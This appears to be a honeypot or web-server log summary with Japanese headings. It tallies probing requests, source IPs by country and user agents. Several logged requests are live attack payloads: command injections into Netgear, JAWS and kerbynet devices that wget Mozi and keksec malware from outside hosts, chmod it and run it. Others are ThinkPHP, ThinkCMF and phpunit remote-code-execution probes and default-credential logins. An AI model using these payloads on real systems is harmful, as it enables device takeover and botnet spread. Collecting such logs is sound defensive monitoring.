2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/MyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/PMA/index.php?lang=en	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/admin/db/index.php?lang=en	HTTP/1.1
1	GET	/admin/index.php?lang=en	HTTP/1.1
1	GET	/admin/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/sqladmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/sysadmin/index.php?lang=en	HTTP/1.1
4	GET	/config/getuser?index=0	HTTP/1.1
2	GET	/console/	HTTP/1.1
1	GET	/database/index.php?lang=en	HTTP/1.1
1	GET	/db/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/dbadmin/index.php?lang=en	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/manager/text/list	HTTP/1.1
1	GET	/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql-admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/index.php?lang=en	HTTP/1.1
1	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysqladmin/index.php?lang=en	HTTP/1.1
1	GET	/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/php-myadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin1/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin2/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin3/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin4/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin5/index.php?lang=en	HTTP/1.1
1	GET	/phpMyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmy-admin/index.php?lang=en	HTTP/1.1
1	GET	/phpmy/index.php?lang=en	HTTP/1.1
1	GET	/phpmyAdmin/index.php?lang=en	HTTP/1.1
202	GET	/phpmyadmin/	HTTP/1.1
1	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin1/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin4/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin5/index.php?lang=en	HTTP/1.1
1	GET	/phppma/index.php?lang=en	HTTP/1.1
1	GET	/pma/index.php?lang=en	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/program/index.php?lang=en	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//125[.]26[.]241[.]203:45027/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//205[.]236[.]184[.]238:35121/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shopdb/index.php?lang=en	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/sqlmanager/index.php?lang=en	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	HEAD	http[:]//112[.]124[.]42[.]80:63435/	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
1	POST	/HNAP1/	HTTP/1.0
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
2	POST	/cgi-bin/ViewLog.asp	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	2.57.122.186	Romania
1	3.10.154.220	United States
1	15.237.126.252	United States
1	31.0.210.36	Poland
2	35.202.184.38	United States
1	42.228.193.252	China
1	42.231.248.205	China
6	51.89.148.30	France
1	65.157.48.186	United States
18	91.241.19.84	Russia
1	104.168.21.170	United States
1	111.19.162.235	China
1	160.39.129.52	United States
1	162.243.128.38	United States
2	172.245.211.58	United States
1	185.132.53.84	Germany
2	185.172.110.235	Netherlands
1	191.96.232.248	Chile
1	192.241.215.51	United States
1	192.241.236.133	United States
1	209.141.38.163	United States

UserAgent一覧

件数	UserAgent
4	-
1	ApiTool
1	Go-http-client/1.1
18	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
3	Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
4	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3	Mozilla/5.0 zgrab/0.x
6	TBI-WebScanner/0.0.1 (+https://leakix.net/)
2	python-requests/2.3.0 CPython/2.7.18 Windows/10

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x16\x03\x01
1	CONNECT	leakix[.]net/:443	HTTP/1.1
5	GET	/.env	HTTP/1.1
1	GET	/.git/config	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
2	GET	/boaform/admin/formLogin?username=adminisp&psd=adminisp	HTTP/1.0
2	GET	/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0a/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%22wget%20http[:]//107[.]174[.]133[.]119/bins/keksec.x86%20-O%20/tmp/.keksec.x86;curl%20http[:]//107[.]174[.]133[.]119/bins/keksec.x86%20-O%20/tmp/.keksec.x86;%20chmod%20777%20/tmp/.keksec.x86;%20/tmp/.keksec.x86%22%0a'	HTTP/1.1
1	GET	/composer.json	HTTP/1.1
1	GET	/composer.lock	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
2	GET	/console/	HTTP/1.1
1	GET	/debug/default/view?panel=config	HTTP/1.1
1	GET	/frontend_dev.php/$	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/manager/text/list	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
2	POST	/api/jsonws/invoke	HTTP/1.1
6	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/editBlackAndWhiteList	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1